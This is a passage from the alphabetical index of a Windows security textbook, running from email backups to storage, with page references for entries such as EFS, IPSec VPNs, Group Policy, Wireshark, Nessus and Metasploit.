backups, 391-396, 393-396
installing, 387-390, 388-389
encryption, 390
file extensions for, 379-380, 379-380
graphics in, 380-381, 380-381
Link Logger, 405
security zones for, 381-382, 381-382
spam, 382-387, 384-386
Email tab, 405
Enable Strong Protection option, 393
Enable the Save My Password option, 311
Enabled (Scheduled Task Runs At
Specified Time) option, 202
Encrypt Contents To Secure Data option,
165, 167
Encrypt The File Only option, 166-167
Encrypting File System (EFS), 156-157
content for
accessing, 167, 170
creating, 164-168, 166-167
recovering, 170-175, 172-174
sharing, 168-170, 169
Data Recovery Agent policy for,
161-164, 161-164
users for, 159-160, 160
volume configuration for, 158-159,
158-159
encryption
BitLocker. See BitLocker drive encryption
emails, 390
performance with, 300
SAM database, 175
in VPNs, 288, 294
Web traffic, 407-409, 408-409

Encryption Details dialog box, 169, 174
End User License screen, 498
Enforce Password History option, 261
Engine And Virus Definition option, 115
erasing media, 534-539, 536-538
Error option for Security log, 465, 467
Error Report Contents dialog box, 474
Error Signature dialog box, 474
escalation of privilege, 25
estimating potential loss, 4-5
European Institute of Computer Antivirus
Research (EICER), 118
Event IDs, 464
Event Log option, 451
event logs
monitoring, 269-271, 269-270,
464-467,464-467
settings, 452-453, 452-453
Event Properties dialog box, 465-467
Event Viewer, 269-271, 269, 464-467,
464-467
exceptions for Windows Firewall, 41-42, 42
Exceptions tab, 41-42, 42
Excluded File Types option, 548
Excluded Processes option, 549
Experience tab, 309, 309
exploit software, 468
Explore All Users option, 80
Export Template option, 71
exposure factor (EF), 4
extensions, displaying, 379-380, 379-380
external storage devices, disabling, 86-93,
88-93
Extract All Files option, 236-237

F

Failed option, 457
Failure Audit option, 465-466
Failure option, 451
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failures, triggering on, 463-464, 463
fault tolerance, 188-194, 190-194
Federal Information Processing Standard
(FIPS). See PGP Desktop
File Allocation Table (FAT) filesystem
converting to NTFS, 178-188,
180-187
deleted files, 501
EFS support for, 158
File And Printer Sharing service, 39,
42,209
initiating, 357-360, 357-360
personal firewalls, 355-356
File Download dialog box, 236, 236
File Download - Security Warning Dialog
screen, 479, 479
files
exchanging, 396-400, 397-398
extensions, 379-380, 379-380
Filter tab, 465-467, 465
filters
MAC addresses, 329-331
packet, 319-323, 320323, 483
security logs, 270-271, 465-467, 465
spam, 385-386, 386
FIPS (Federal Information Processing
Standard). See PGP Desktop
Firesheep, 150-153, 152-153
firewalls
configuring, 40-45, 41-44
IPSec VPN, 345-347, 345-347
packet filters in, 319
personal, 352-353
folders shares, 357-360, 357-360
reviewing, 354-356, 354-356
settings, 360-361, 361
first-party cookies, 372-373
Fix Selected Problems option, 133
Folder Options dialog box, 379,
379-380

folders shares with personal firewalls,
357-360, 357-360
Font Download option, 382
Force-TLS application, 409-411, 410-411
forcing memory dumps, 468—469
minidump configurations, 469-472,
470-471
Registry, 472, 472
reviewing, 473-476, 473-475
triggering, 473, 473
Format Partition screen, 184, 184
Format Volume screen, 193, 193
free space, determining, 535-538,
536-538
FTP, 396-400, 397-398
fully qualified domain names

(FQDN), 279

G

General tab
EFS, 165, 174
packet filters, 320, 321
RDP, 310-311, 310
services, 29
System Configuration Utility, 76
Windows Firewall, 41, 41
global security groups, 256
golden child applications, 94
government regulations, 19
Gramm-Leach-Bliley Act, 19
graphics, 380-381, 380-381
Group Or User Names field, 36
Group Policy Objects (GPOs)
Client Respond IPSec Policy, 293
external storage devices, 86-93, 88-93
IPSec Secure Server Policy, 291-292
object access, 450-453, 451-453
refreshing, 455
Secure Server IPSec Policy, 292
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security templates, 72-73
service lockdown, 33-36, 33-36
services, 26
users, 258-259, 258
Group Policy tab, 89, 89, 450-451
groups
AGDLP, 210-213, 211-213
Deny, 279-284, 281-285
Guest accounts, 272
Guidelines for Media Sanitation, 534

Hardened Servers.inf file, 73
hardening systems, 24
Autorun security. See Autorun security
hardware devices, 84-85
CD-ROM AutoRun function,
85-86, 85-86
external storage devices, 86-93,
88-93
locking computers, 102-109, 104-108
patches. See operating system patching
port management, 39-40
testing, 45-49, 47-48
Windows Firewall for, 40-45,
41-44
security templates, 65-66
custom, 68-72, 68-72
default, 66-68, 67
GPOs for, 72-73, 72-73
service management. See services
virtualization, 94-95
virtual machines, 96-102, 96-101
VMware, 94-95
hardware devices, 84-85
CD-ROM AutoRun function, 85-86,
85-86
external storage devices, 86-93, 88-93
hardware failures, threat analysis for, 5
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Hardware tab, 316, 316
Hardware Update Wizard, 521-522, 522
hashes
for download validation, 400-403, 402
Force-TLS application, 410-411,
410-411
HTTPS, 408-409, 408-409
SHA, 289
Have Disk option, 522
hdderase.exe tool, 534
headers, browser, 433-434
Health Insurance Portability and
Accountability Act (HIPAA), 19-20
Helix Live distribution, 95-96, 100-101
Hide File Extensions For Known File
Types option, 380
HIDSs (host-based intrusion detection
systems), 539-550, 542-550
High Priority patches, 52
High setting
Internet Explorer security, 369
spam, 384
HIPAA (Health Insurance Portability
and Accountability Act), 19-20
Hiscews security template, 67
Hisecdc security template, 67
History tab, 545, 545
host-based intrusion detection systems
(HIDSs), 539-550, 542-550
hostile IP tracking, 434-438, 435-437
Hosts tab, 143
How To Correct This option, 427
HTTPS encryption, 407-409, 408-409

I Love You virus, 112, 378

ICMP frames, 44

ICS (Internet Connection Sharing),
373-378,375-376
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identity theft, 19-20
idle time-outs, 102-109, 104-108
IDs
Event, 464
Nessus information on, 419
IDSs (intrusion detection systems),
539-550, 542-550
If Message’s Character Set Is Different
From English option, 386
Immunize option, 131
Import Policy option, 72
Inbound Filters dialog box, 320-323, 323
incident investigation, 448
audit log reviews, 459-468, 461-468
deleted content. See recovering
file recovery. See Volume Shadow
Copy (VSC)
memory dumps, 468—469
minidump configuration, 469-471,
470-471
Registry for, 472,472
reviewing, 473-476, 473-475
triggering, 473, 473
object access, 449-458, 451-458
packet capturing, 476-486, 479-486
Include All Certificates In The
Certification Path If Possible
option, 393
Include All Local (Intranet) Sites Not
Listed In Other Zones option, 370
Include All Network Paths (UNCs)
option, 370
Include All Sites That Bypass The Proxy
Server option, 370
.inf extension, 67
information classification, 20-22
Information option for Security log,
465, 467
inheritable permissions, 216-217
inherited auditing attributes, 457

Initialize And Convert Disk Wizard,
180-182, 181-182, 190-191,
190-191

initializing

backups, 197-200, 198-200
disks, 189-191, 190-191
restores, 206-207, 206-207
VPN services, 295-298, 295-298

Install From A List Or Specific Location
(Advanced), 521

Install From Disk dialog box, 522

Install WinPcap? screen, 480, 481

Installation Progress dialog box, 530

installation summary for patches, 54

installing

AD-Aware, 126

applications, 530, 531

avast!, 114, 114115

Cain & Abel, 142-149, 143-149

digital certificates, 388-390,
388-389

email certificates, 394-395, 394

Firesheep, 151-152, 152

Malicious Software Removal Tool,
134-135, 135

McAfee Site Advisor, 138, 138

Metasploit, 443, 443

Microsoft Security Essentials, 541-545,
542-545

Netcat, 439-440

Outlook spam filter, 385-386, 386

PGP Desktop, 236-238, 236-238

Previous Versions, 496-500, 497-500

Rootkit Hunter, 120-122

Spybot-S&D, 130-131

UndeletePlus, 505-507, 505-506

Wireshark, 337, 479-481, 480-482

integrity
asset, 518
in VPNs, 288
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Integrity and Encryption Algorithm dialog
box, 349, 349
Interface Properties dialog box, 323, 334
International tab, 384, 385
Internet, 364
access, 364-368, 366-367
digital certificates
backups, 391-396, 393-396
installing, 387-390, 388-389
download validation, 400-403, 402
email, 378-382, 379-382
file exchange, 396-400, 397-398
ICS, 373-378, 375-376
Internet Explorer
cookies, 371-373, 373
security zones, 367-371, 370-371
logging and recording activity,
403-407, 404-406
spam, 382-387, 384-386
vulnerability profiling, 430-434,
431,433
Web browsing security, 409-411,
410-411
Web traffic encryption, 407-409,
408-409
Internet Connection Sharing (ICS), 364,
373-378, 375-376
Internet Explorer
cookies, 371-373, 373
security zones, 367-371, 370-371
Internet icon, 369
Internet Information Services Scan
option, 427
Internet Options dialog box
cookies, 373
digital certificates, 392, 392,
394-395
security zones, 369-371, 369-370
Internet Protocol Security. See IPSec
(Internet Protocol Security) VPNs

Internet Protocol (TCP/IP) Properties
dialog box, 377-378, 377
intrusion detection systems (IDSs),
539-550, 542-550
intrusion protection systems (IPSs), 539-540
investigating incidents. See incident
investigation
IP addresses
IPSec VPN, 339-341, 339, 343-344, 344
packet filters, 320-321
SFTP, 399
tracking, 434-438, 435-437
ipconfig command, 339
ipconfig /all command, 331, 377
IPSec Secure Servers Policy, 450
IPSec Settings tab, 347, 347
IPSec (Internet Protocol Security) VPN,
335-337
configuring
AES-256, 347-350, 347-350
general, 342-346, 343-346
connectivity testing and captured data
viewing, 339-342, 339-342
deploying, 289-293, 292
destination computer shares, 337-339,
337-339
validating encryption, 350-352,
350-351
Wireshark sniffer, 337
IPSs (intrusion protection systems),
539-540
IT Shavlik program, 428-430, 429-430

J

Junk E-mail Options dialog box,
384-385,384-385
junk mail
managing, 382-387, 384-386
scanning for, 432-433
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K

KeenValue spyware, 129
Keep Folder Structure option, 509
Kerberos authentication, 289
Kernel Memory Dump option, 471
Key regeneration settings, 349
keys
BitLocker, 227-230, 227-230
digital certificates, 393
encryption, 172, 172
PGP Desktop, 243
keywords in spam filters, 386
knowledge-based IDS analytic engines,
539-540

L

L2TP (Layer 2 Tunneling Protocol), 294,
297,297
LAD (local accounts database), 271
Language, Time Zone and Keyboard
Selection window, 222
LANS (local area networks), 364-366,
366-367
laptop computers encryption. See
BitLocker drive encryption
Last Known Good Configuration (LKGC),
523-526, 525
LaunchPad Installer utility, 83
Layer 2 Tunneling Protocol (L2TP), 294,
297,297
license agreements
avast!, 114
McAfee Site Advisor, 138
Microsoft Security Essentials, 540
Nessus, 416
PGP Desktop, 236, 238, 240, 240
Retina, 420
Volume Shadow Copy, 498, 506

WinPcap, 481
Wireshark, 480
Limit The Number Of Simultaneous Users
To setting, 358
Link Logger program, 404-406, 405-406
LKGC (Last Known Good Configuration),
523-526, 525
loadable kernel modules (LKMs), 119
local accounts database (LAD), 271
Local Administrators, 171-172, 271
Local Area Network Interface option, 320
local area networks (LANSs), 364-366,
366-367
Local Intranet icon, 369
Local Intranet window, 370-371, 370
Local Policies, 69, 73
Local Resources tab, 308, 308
Local Security Settings dialog box,
162-163, 162
Local System account, 30-32, 31-32
Lock This Computer option, 105
locking
computers, 102-109, 104-108
services, 33-36, 33-36
lockout policy, 262-263, 262-263
Log On As service account, 30-32, 31-32
logoff scripts for Autorun, 82-83
logon scripts for Autorun, 82-83
logons, auditing, 264-271, 266-270
logs, 264
account logon events, 269-271,
269-270
Default Domain Controllers Policy,
267-269, 267-269
Internet activity, 403-407, 404-406
reviewing, 459-468, 461-468
settings, 452-453, 452-453
size, 267, 267, 452, 452
loss potential, estimating, 4-5
lost encryption keys, 172, 172



Low setting
Internet Explorer security, 369
for spam, 384

MAC (Media Access Control) addresses
finding, 331
with switches, 477
in wireless security, 329-331
Macro virus infections, 112
Maintenance option, 116
malicious software
adware, 125-129, 127-128
ARP poisoning, 141-150, 143-149
Firesheep, 150-153, 152-153
Malicious Software Removal Tool,
133-135, 135-136
McAfee Site Advisor, 137-140,
138-140
rootkits, 119-125
spyware, 129-133, 131-133
viruses, 112118, 114-118
Malicious Software Removal Tool,
133-135, 135-136
manual operating system patching,
51-54, 51-54
Manual service startup type, 29
Mark As Good option, 386
Mark As Spam option, 386
master boot record (MBR) infections, 112
Maximum Password Age setting, 261
Maximum Ports setting, 298
Maximum Security Log Size dialog box,
267,267
Maximum Security Log Size Policy
option, 451
MBR (master boot record) infections, 112
MBSA (Microsoft Baseline Security
Analyzer), 424-428, 426-427
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McAfee Site Advisor, 137-140, 138-140
MDS algorithm, 401
mdSsum algorithm, 401-402
media, sanitizing, 534-539, 536-538
Media Access Control (MAC) addresses
finding, 331
with switches, 477
in wireless security, 329-331
Medium setting, 369
Medium-Low setting, 369
Melissa virus, 378
memory dumps, 468—469
minidump configuration, 469-471,
470-471
Registry for, 472, 472
reviewing, 473-476, 473-475
triggering, 473, 473
Message Integrity Check (MIC), 294
Message Options dialog box, 390
Messenger spam, 432—-433
Metasploit tool, 442-446, 443-445
MIC (Message Integrity Check), 294
Microsoft Baseline Security Analyzer
(MBSA), 424-428, 426-427
Microsoft Management Console (MMC)
security templates, 66—68, 67
services, 28
Microsoft Security Essentials (MSE),
541-550, 542-5502
minidumps, 469-472, 470-471
Minimum Password Age setting, 261
Minimum Password Length setting, 261
mirrored volumes, 188, 191-194, 191-194
MMC (Microsoft Management Console)
security templates, 66—68, 67
services, 28
modems, 364, 376
modes, Syskey, 175-178, 177
monitoring
audit logs, 264
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monitoring (continued)
packet analyzers for. See Wireshark
Network Analyzer
security logs, 269-271, 269-270
Move dialog box, 454, 454
MS GINA dialog box, 178
MSConfig utility, 75-79, 76-78
MSE (Microsoft Security Essentials),
541-550, 542-550
MSSecure.xml file, 52
My Use Only option, 301

names
Administrator accounts, 273, 275, 276
IPSec VPN rules, 346, 346
restore points, 529
services, 37
NAT (Network Address Translation),
300, 374
National Institute of Standards and
Technology (NIST), 233
Nessus penetration testing, 414-419,
416-418
net stop command, 37
Netcat tool, 438-441
Netgroup Packet Filter driver, 481
NETLOGON share, 83
netstat command, 45-47, 435-437,
435-437
Microsoft Security Essentials HIDS,
542-550, 542-550
Network Address Translation (NAT),
300, 374
network analyzers, 476-479
data capture, 339-342, 340-341
downloading, 337, 479, 479
installing, 337, 479-481, 480482

IPSec VPN encryption validation,
350-352, 351
network analysis with, 484-486,
485-486
packet capturing with, 482-484,
482-484
Network And Dial-up Connections dialog
box, 375-376
Network And Sharing Center window,
375, 375
Network Connection screen, 301, 301
Network Connections option, 334
Network Connections window, 376, 376
Network Discovery, 355-356
Network Interface Cards (NICs), 325
network paths, 371
network security, 288-289
IPSec. See IPSec (Internet Protocol
Security) VPNs
packet filters, 319-323, 320-323
personal firewalls, 352-353
folders shares, 357-360, 357-360
reviewing, 354-356, 354-356
settings, 360361, 361
remote administration, 304-305
clients, 307-311, 308-311
connections, 311-312
servers, 306-307, 306
Run As, 312-318, 315-317
VPN
clients, 300-304, 301-304
servers, 293-300, 295-299
wireless, 323-325
access points, 326-330, 326-330
clients, 331-335, 332-334
Network tab, 142
Networking tab, 302, 302
New ARP Poison Routing box, 147, 147
New Connection Wizard, 301-302,
301-302, 365-366, 366-367



New Object - Group dialog box — Override Automatic Cookie Handling 567

New Object - Group dialog box, 211, 211,
281, 281
New Object - User dialog box, 212, 212,
254,254-255
New Partition Wizard, 182-185, 182-185
New Rules option, 343, 343
New Technology File System (NTFS)
converting FAT to, 178-188, 180-187
permissions for, 216, 283-285,
284-285
Recycle Bin, 501
New Text Document Properties dialog
box, 504, 504
New Text Document.txt file, 510-511,
513-514
New User dialog box
EFS, 160
nonadministrator users, 314
New Virtual Machine Wizard, 96-98,
96-98
New Volume Wizard, 192-193, 192-193
NICs (Network Interface Cards), 325
NIST (National Institute of Standards and
Technology), 233
Nmap program, 40, 48—49
No Authentication option, 309
No Automatic Filtering option, 384
nonadministrator users for Run As
function, 314-318, 316-317
nonpromiscuous mode, 477
nonrepudiation, 294
Notepad, 88
Notify Me But Don’t Automatically
Download Or Install Them option, 55
npf.sys file, 481
NTDSUTIL utility, 277-279
NTFS (New Technology File System)
converting FAT to, 178-188, 180-187
permissions for, 216, 283-285, 284-285
Recycle Bin, 501

(o)

object access, 449-450
auditing GPOs for, 450-453, 451-453
group policy refreshing for, 455
resource servers for
auditing by, 455-458, 455-458
location of, 453-454, 454
Obtain An IP Address Automatically
option, 377
Obtain DNS Server Address Automatically
option, 377
Office spam filter, 385
On Resume, Display Logon Screen
option, 107
Only Show Policy Settings That Can Be
Fully Managed option, 92
Open File - Security Warning dialog box,
238,479
open ports, 45-49, 47-48
operating system patching, 50-52
automated
in Domain mode, 55-65, 56-64
in Workgroup mode, 54-55, 55
manual, 51-54, 51-54
Optimize Security screen, 542
Options dialog box
digital certificates, 388, 390
graphics, 380-381, 380-381
Organizational Unit option, 33
organizational units (OUs)
GPOs for, 33-34
for groups, 211
infrastructure for, 290-291
for resource servers, 453-454, 454
outages, threat analysis for, 5
Outlook. See email
Outlook Spam Filter Settings dialog box,
385-386, 386
Override Automatic Cookie Handling
option, 373
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packet analyzers, 476-479
data capture, 339-342, 340-341
downloading, 337, 479, 479
installing, 337, 479-481, 480-482
IPSec VPN encryption validation,
350-352, 351
network analysis with, 484-486, 485-486
packet capturing with, 482-484,
482-484
packet filters, 319-323, 320-323
partitions
BitLocker encryption, 222-225,
222-224
converting FAT to NTFS, 178-188,
180-187
Password Can Be Changed After setting, 261
Password Must Be At Least setting, 261
Password Must Meet Complexity
Requirements option, 262
Password Never Expires option, 160,
212, 461
password-protected screen savers,
102-103, 107-109, 107-108
Password Will Expire In setting, 261
passwords and passphrases
BitLocker, 227-230, 227-230
Cain & Abel, 143, 149
Data Recovery Agent policy, 162
decoy domain administrator
accounts, 276
digital certificates, 164, 393-394
DSRM administrators, 277-279
encryption, 170
PGP Desktop, 233
collections of files, 246, 246,
249-250, 250
entering, 242-243, 242
RDP, 311
Run As function, 318

service management, 32
SFTP, 399
strong, 254
Syskey, 177
users, 159-160, 212
default, 271-272
new accounts, 461
policies, 259-263, 261-263
templates, 256-257
VPN clients, 302
wireless access points, 326, 330
wireless clients, 332
Passwords tab, 143
patching operating systems, 50-52
automated
in Domain mode, 55-65, 56-64
in Workgroup mode, 54-55, 55
IT Shavlik for, 428-430, 429-430
manual, 51-54, 51-54
penetration testing
Metasploit, 442-446, 443-445
Nessus, 414-419, 416-418
Retina, 419-424, 421-424
Perform A Quick Format option, 184
permissions
AGDLP, 216-219
EFS, 159
encryption, 167
IPSec VPN, 338
log files, 459
NTEFS, 216, 283-285, 284-285
personal firewalls, 359-360, 359-360
services, 25
share points, 219
user accounts, 461-463, 461-462
personal firewalls, 352-353
folders shares, 357-360, 357-360
reviewing, 354-356, 354-356
settings, 360-361, 361
personal security, policy development
for, 11



Personal tab, 392
PGP Corporation utility, 156
PGP Desktop, 232-234, 234-235
acquiring, 235-236, 236
configuring, 239-244, 239-244
file collections in
accessing, 249-250, 249-250
creating, 244-248, 244-248
installing, 236-238, 236-238
PGP Setup Assistant, 239-244, 239-244
PGP Zip Assistant, 246-248, 246-248
Phrase Filter tab, 386
physical and environmental security
checklist, 16-19
policy development for, 10
pictures in email, 381
PIDs (Process Identifiers), 46-48
ping command, 339
PKI (Public Key Infrastructure), 171
plug-ins, 416-417
Point-to-Point Tunneling Protocol
(PPTP), 294
poisoning, ARP, 141-150, 143-149
policies
audit. See Audit Policy
development overview, 10-12
group. See Group Policy Objects (GPOs)
password, 259-263, 261-263
ranking, 8-12
pop-ups, 125-129, 127-128
Port Authority tool, 43
Port Authority website, 47
port scanning, 440
portable computers encryption. See
BitLocker drive encryption
ports and port management, 39-40
services for, 25
testing, 45-49, 47-48
VPN servers, 297-298, 297
Windows Firewall for, 40-45, 41-44
potential loss, estimating, 4-5
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PPTP (Point-to-Point Tunneling
Protocol), 294
Pre-Shared Keys (PSKs)
IPSec VPN, 345, 345
wireless security, 324, 331-332
prebuilt packet filters, 483
Prevent Local Guests Group From
Accessing Security Log option,
268,452
Previous Versions Client. See Volume
Shadow Copy (VSC)
Previous Versions tab, 495-496, 496, 499
principle of least privilege, 209
Privacy tab, 373
private classification, 20
private keys, 393
Private option for IPSec VPN
firewalls, 345
Private profiles, 354
privileges for services, 25
problem child applications, 94
Process Identifiers (PIDs), 46—48
processes, listing, 47-48, 48
Processes tab, 47-48
profiles for personal firewalls, 354
Program Update option, 115
Programs tab, 309
Prohibit Adjusting Desktop Toolbars
option, 259
Prohibit User From Changing My
Documents Path option, 258
promiscuous mode, 476—-477
protecting deleted data, 534-539,
536-538
protocol analyzers, 476-479
downloading, 479, 479
installing, 479-481, 480-482
network analysis with, 484-486,
485-486
packet capturing with, 482-484,
482-484
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prudent security, 232
PSKs (Pre-Shared Keys)

IPSec VPN, 345, 345

wireless security, 324, 331-332
public classification, 20
Public Key Infrastructure (PKI), 171
Public option for IPSec VPN firewalls, 345
Public profiles, 354
purging media, 534-539, 536-538
PurityScan spyware, 129
pwned term, 84

Q

qualitative risk assessment, 2
quantitative risk assessment, 2-3
Query tab, 142

Quick scans, 543-544, 544

RAID (Redundant Array of Independent
Disks) systems, 188-194, 190-194
random access memory (RAM) dumps,
468-469
minidump configuration, 469-471,
470-471
Registry for, 472,472
reviewing, 473-476, 473-475
triggering, 473, 473
RDP (Remote Desktop Protocol), 304-305
clients, 307-311, 308-311
connections, 311-312
servers, 306-307, 306
Real-Time Shields option, 116
Receive All Packets Except Those That Meet
The Criteria Below option, 322-323
recording Internet activity, 403-407,
404-406

recovering
deleted content, 501-502
Recycle Bin, 502-504, 503-504
UndeletePlus tool, 505-516,
505516
encrypted files, 170-175, 172-174
Recovery option, 131
recovery password keys, 227-230,
227-230
Recycle Bin, 501
UndeletePlus with, 507, 507
working with, 502-504, 503-504
Redundant Array of Independent Disks
(RAID) systems, 188194, 190194
refreshing group policies, 455
Refreshing Policy window, 455
Registry
Autorun security, 78-80, 78-80
editing dangers, 78
“known good” settings, 523-524
Last Known Good Configuration for,
523-525
for memory dumps, 472, 472
spyware changes to, 129
for system services, 37
remanents
creating, 507, 507
recovering, 508-516, 508-516
Remediate tab, 423, 423
Remote Desktop Connection dialog box,
311-312
Remote Desktop Protocol (RDP), 304-305
clients, 307-311, 308-311
connections, 311-312
servers, 306-307, 306
remote systems, attacks on, 441
Remote tab, 306, 306
Remove All option, 129
Remove My Computer Icon On The
Desktop option, 258
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Rename User dialog box, 275, 276
renaming Administrator account, 273,
275,276
Replace Auditing Entries On All Child
Objects With Entries Shown Here That
Apply To Child Objects option, 458
reports
Nessus, 417-418, 418
Retina, 423, 424
Require Encryption For All Connection
Security Rules That Use These
Settings option, 348
Require Startup USB Key At Every Startup
option, 228
Reset Account Lockout Counter After
setting, 263
resetting
DSRM administrator passwords,
277-279
services, 37-38, 38
resource servers
object access on, 455-458, 455-458
OUs for, 453454, 454
Restore And Manage Media tab, 204, 204
Restore My Computer To An Earlier Time
option, 531
Restore Progress dialog box, 206, 207
Restore Security option, 206
restoring
backup data, 203-208, 204-208
system. See System Restore feature
Restrict Drives folder, 91-92
Restricted Sites icon, 369, 371
Restricted Sites window, 371
Retention Method For Security Log
option, 268, 453
Retina penetration testing, 419-424,
421-424
reusing media, 534-539, 536-538
Review and Install Updates option, 52

reviewing
audit logs, 459-468, 461-468
memory dumps, 473-476, 473-475
revocation, certificate, 395-396, 395-396
rights for services, 25
Rijndael ciphers, 220
risk assessment, 2—8
risk factors, Nessus information on, 419
Rivest, Ron, 401
rogue protocols, 476
rootkit checkers, 119-125
Rootkit Hunter tool
installing, 120-122
running, 122-125
Rootsec security template, 68
Router tab, 405, 405
Routing and Remote Access Services (RRAS)
packet filters in, 320-323, 320-323
for VPN, 295-298, 295-298, 303, 303
Routing tab, 143
RRAS Setup Wizard, 295-296, 296
Rule Type screen, 343, 343
rules
intrusion protection systems, 539
IPSec VPN, 343, 343, 346, 346
Run As dialog box, 317-318, 317
Run As function, 312-314
command-line, 318
nonadministrator users for, 314-318,
316-317
Secondary Logon Service for, 314-315,
315
Run Components Not Signed With
Authenticode option, 370, 382
Run Components Signed With
Authenticode option, 370
Run entry, 79-80
RunOnce entry, 79-80
RunOnceEx entry, 79
Russia, spam from, 385
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SACL (System Access Control List), 456
Safe Lists Only option, 384
Safe mode
booting into, 519-523, 520-522
System Restore from, 533
Safe Recipients List, 383
Safe Senders List, 383
SAM (Security Accounts Management)
database, 175
sanitizing media, 534-539, 536-538
SANS Institute, 12
SANS Internet Storm center, 435
Satan tool, 438
Save As dialog box
for backups, 197, 198
for RDP settings, 311, 311
Save This Username And Password For
The Following Users option, 302
saving RDP settings, 311, 311
Scan A Computer option, 426
Scan Computer option, 116
Scan MAC Addresses option, 144
Scan More Than One Computer
option, 426
Scan Multiple Computers option, 426
Scan Type screen, 135, 135
scanners
Nessus, 414-419, 416-418
Retina, 419-424, 421-424
scanning
AD-Aware, 126-129, 127-128
avast!, 116-118, 116-118
Messenger spam, 432-433
Netcat, 440
SCAT (Security Configuration and
Analysis Tool), 66, 68-72, 68-72
Schedule Job dialog box, 201-202,
201-202

Schedule tab, 37, 38
Scheduled Job Options dialog box,
201-202, 201
schedules
daily backups, 200-203, 200-202
Microsoft Security Essentials scans,
545, 545
resetting services, 37-38, 38
Volume Shadow Copy, 490, 490
Screen Saver Settings dialog box,
107, 108
screen savers, password-protected,
102-103, 107-109, 107-108
Script ActiveX Controls Marked Safe For
Scripting option, 382
scripts
Autorun security, 82-83, §2
resetting services, 37-38, 38
Search & Destroy option, 131-132, 132
Secondary Logon service, 313-315, 315
Secure Erase tool, 534
Secure FTP (SFTP) server, 397-398,
397-398
Secure Hashing Algorithm (SHA), 289
secure remote administration, 304-305
clients, 307-311, 308-311
connections, 311-312
servers, 306-307, 306
Secure Server IPSec Policy GPO,
291-292, 292
Secure Server (Require Security)
option, 291
Secure Sockets Layer (SSL), 408, 410
Securedc security template, 67
securews.inf file, 69
Securews security template, 67
Securing The Windows XP Account
Database dialog box, 176-178, 177
Security Accounts Management (SAM)
database, 175



security assessments
IT Shavlik for, 428-430, 429-430
Microsoft Baseline Security Analyzer
for, 424-428, 426-427
physical and environmental, 16-19
risk, 2-3
Threat Analysis Index, 129
Security Configuration and Analysis Tool
(SCAT), 66, 68-72, 68—72
Security dialog box for email, 381-382
security education, training, and
awareness (SETA) task, 12-16
Security for ClipBook dialog box, 36, 36
Security logs
account logon events, 269-271,
269-270
in Default Domain Controllers Policy,
267-269, 267-269
reviewing, 464-467, 464-467
settings, 452-453, 452-453
security organization, policy development
for, 11
security policies
audit. See Audit Policy
development overview, 10-12
group. See Group Policy Objects
(GPOs)
password, 259-263, 261-263
ranking, 8-12
Security Properties dialog box, 390, 390
security scanners
Nessus, 414-419, 416-418
Retina, 419-424, 421-424
Security Settings dialog box, 370, 371,
382, 382
Security Settings Name field, 388
Security tab
EFS, 159, 159, 166, 166, 173, 173
email, 381-382
graphics, 381, 381
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Internet Explorer, 368-369, 369
RDP, 309, 310
shares, 215-216, 216, 218
user accounts, 461-462, 461
security templates, 65-66
custom, 68-72, 68-72
default, 66-68, 67
GPOs for, 72-73, 72-73
Security Update Scan Results option, 426
security zones
email, 381-382, 381-382
Internet Explorer, 367-371, 370-371
Select Certificate dialog box, 389, 389
Select Disks screen, 192, 192
Select Disks To Convert screen, 181,
181, 191
Select Disks To Initialize screen, 190
Select Partition Type screen, 182, 183
Select Recovery Agents screen, 163, 163
Select Remote Users option, 307
Select The Program From A List
option, 475
Select User dialog box, 169, 174
Select User, Computer, Or Group dialog
box, 456457, 456457
Select Users, Computers, Or Groups
dialog box, 461-462, 462
Select Volume Type screen, 192, 192
Send These Certificates With Signed
Messages option, 390
sensitive classification, 20
servers
ICS, 375-376, 375-376
RDP, 306-307, 306
resource, 453-458, 454-458
VPN, 293-300, 295-299
Service Control dialog box, 315
services, 25-27
accounts for, 30-32, 31-32
Computer Management for, 27-28, 27
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services (continued)
dependencies between, 26, 28-29, 28
disabling and stopping, 29-30, 29
locking down, 33-36, 33-36
resetting, 37-38, 38
Services tab, 77, 77
SETA (security education, training, and
awareness) task, 12-16
Settings dialog box, 490-491, 490
Settings tab, 545-550, 545-550
Setup Security template, 67
SFTP (Secure FTP) server, 397-398,
397-398
SFTP Root field, 398
SFTP Root Path dialog box, 398, 398
SHA (Secure Hashing Algorithm), 289
Shadow Copies Of Selected Volume
section, 491
Shadow Copies tab, 489-492, 489, 493-494
Shadow Copy Client, 487-488, 496
Shadow Copy Client Setup Wizard, 498
ShadowCopyClient.msi file, 498
share points, 208-209, 219
Share This Folder option, 338, 358
shares, 208-210
AGDLP for
content for, 213-219, 213-219
users and groups for, 210-213,
211-213
content for, 210
Sharing tab, 337, 337
ShieldsUP tool, 431-434, 431, 433
short-term outages, threat analysis for, §
SHOTGUN server, 454
Show The Contents Of This Folder option,
158, 165, 167, 170
Shred Originals option, 246
Shut Down option, 106
Shut Down System Immediately If Unable
To Log Security Audits option, 269

Shut Down Windows dialog box, 177
shutdown
abnormal, 469
scripts for, 82-83
sidejacking attacks, 150-153, 152-153, 409
signatures with PGP Desktop, 247, 247
Signing Certificate field, 389
Single Loss Expectancy (SLE), 3-8
Site Advisor, 137-140, 138-140
size
logs, 267, 267, 452, 452
packet capture buffers, 483
partitions, 183, 183
slack space, 535-538, 536-538
SLE (Single Loss Expectancy), 3-8
Small Memory Dump (64 KB) option, 471
Sniffer tab, 142-143
sniffers, 476-479
Cain & Abel, 142-143
downloading, 479, 479
installing, 479-481, 480-482
network analysis with, 484-486,
485-486
packet capturing with, 482-484,
482-484
sniffing, 409
Software Explorer utility, 74
Source Network option, 321
South Korea, spam from, 385
spam
managing, 382-387, 384-386
scanning for, 432-433
Spam Me With This Note option, 433
Spam Recognition Keywords List dialog
box, 386, 386
SpamAid Settings dialog box, 386, 386
Specify Disk Capacity screen, 98, 98
Specify Intranet Microsoft Update Service
Location Properties dialog box,
64, 64
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Specify Partition Size screen, 183, 183
Spybot-S&D program, 130-133,
131-133
SpyNet, 550
spyware, 129-133, 131-133
SQL Slammer virus, 378
SSIDs, 328, 328
SSL (Secure Sockets Layer), 408, 410
Start menu for locking computers,
106, 106
Start Undelete option, 512
Startup And Recovery dialog box,
470-472, 470-471
Startup folder, 80-81, 80-81
Startup Key dialog box, 177, 177
startup scripts, 82—-83
Startup tab, 77, 78
Startup Type setting, 29-30
stolen equipment, threat analysis for, 5
StopAlerter script, 37-38
stopping services, 29-30, 29
storage, 156
backups. See backups
encryption. See Encrypting File System
(EES); encryption
fault tolerance for, 188-194,
190-194
FIPS. See PGP Desktop
NTEFS filesystems, 178-188, 180-187
shares, 208-219, 211-219
Syskey for, 175-178, 177
Store Startup Key Locally option, 178
